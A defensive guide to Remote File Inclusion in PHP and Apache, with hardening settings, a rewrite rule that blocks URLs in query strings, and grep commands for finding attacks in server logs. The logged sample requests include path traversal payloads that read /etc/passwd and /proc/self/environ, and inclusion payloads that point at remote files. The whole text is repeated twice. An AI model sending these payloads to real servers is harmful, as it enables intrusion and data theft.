Remote File Inclusion (RFI) attacks
Remote File Inclusion (RFI) is a technique used to attack Web applications from a remote computer. Such attacks allow malicious users to run their own code on a vulnerable Web server by including code from a URL to a remote server. When an application executes the malicious code, it may lead to a back-door exploit or technical information retrieval. This is an application vulnerability that is a result of insufficient validation of user inputs.
Disable allow_url_fopen in php.ini by setting it to 0
Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe!)
Lockdown the server environment to prevent the server from making new outbound requests
Using Apache mod_rewrite is also an effective security measure to prevent RFI attacks. To use it, in your .htaccess, add the following lines:
RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [F,L]
The RewriteCond will match the found pattern, and the RewriteRule determines where to redirect the attacker. Here, the F and L options will block the request.
There are two php.inioptions you can set, which control different aspects of file handling, and work to prevent RFI:
allow_url_fopen=off
allow_url_include=off
The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, set magic_quotes_gpc=On to automatically escape all single and double quotes, backslashes and NULLs with a backslash, in GETs, POSTs and cookies. The other magic quote directive (magic_quotes_runtime=On) will escape quotes for a select list of functions.
Apache log poisoning with LFI
Apache normally uses two log files: access_log, which contains all valid requests to the Web server, and error_log, which contains error messages.
/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log
RFI Detection
Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.
grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~`
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com- "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~
grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"
grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"
grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
10.45.14.165 - example.com- "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com- "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"
With such a vulnerability, attackers can execute any binary on the server like starting a telnet server, logging in to it with the privileges of a Web server user, performing exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.
Reference
https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts
Remote File Inclusion (RFI) is a technique used to attack Web applications from a remote computer. Such attacks allow malicious users to run their own code on a vulnerable Web server by including code from a URL to a remote server. When an application executes the malicious code, it may lead to a back-door exploit or technical information retrieval. This is an application vulnerability that is a result of insufficient validation of user inputs.
Disable allow_url_fopen in php.ini by setting it to 0
Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe!)
Lockdown the server environment to prevent the server from making new outbound requests
Using Apache mod_rewrite is also an effective security measure to prevent RFI attacks. To use it, in your .htaccess, add the following lines:
RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [F,L]
The RewriteCond will match the found pattern, and the RewriteRule determines where to redirect the attacker. Here, the F and L options will block the request.
There are two php.inioptions you can set, which control different aspects of file handling, and work to prevent RFI:
allow_url_fopen=off
allow_url_include=off
The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, set magic_quotes_gpc=On to automatically escape all single and double quotes, backslashes and NULLs with a backslash, in GETs, POSTs and cookies. The other magic quote directive (magic_quotes_runtime=On) will escape quotes for a select list of functions.
Apache log poisoning with LFI
Apache normally uses two log files: access_log, which contains all valid requests to the Web server, and error_log, which contains error messages.
/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log
RFI Detection
Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.
grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~`
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com- "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~
grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"
grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"
grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log
10.45.14.165 - example.com- "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com- "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"
With such a vulnerability, attackers can execute any binary on the server like starting a telnet server, logging in to it with the privileges of a Web server user, performing exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.
Reference
https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts
